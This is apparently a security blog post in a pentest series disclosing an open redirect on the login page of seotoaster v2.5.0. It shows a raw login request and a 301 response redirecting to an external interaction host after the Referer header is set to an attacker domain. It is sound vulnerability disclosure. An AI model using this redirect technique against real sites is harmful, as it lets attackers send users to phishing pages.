Wednesday, 30 July 2025

Friday Fun Pentest Series - 37 - Open Redirect "Login Page" Functionality - seotoasterv2.5.0

Description

- It was noted that the application was vulnerable to Open Redirect in the "Login Page"


Open Redirect "Login Page" Functionality 1#

Steps to Reproduce:
  1. Login to the application and then add the Referer header to attacker domain

// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

email=admin%40example.com&password=Pasw0rd%21&submit=Let+me+in&secureToken=f3a4d32c75942f7f284ae9189e21d431



// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 13:55:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com
[...]

No comments:

Post a Comment

Friday Fun Pentest Series - 38 - Lack of Password Change Functionality - seotoasterv2.5.0

Description - It was noted that the application lacked password change functionality Lack of Password Change Functionality #1 Steps to Repro...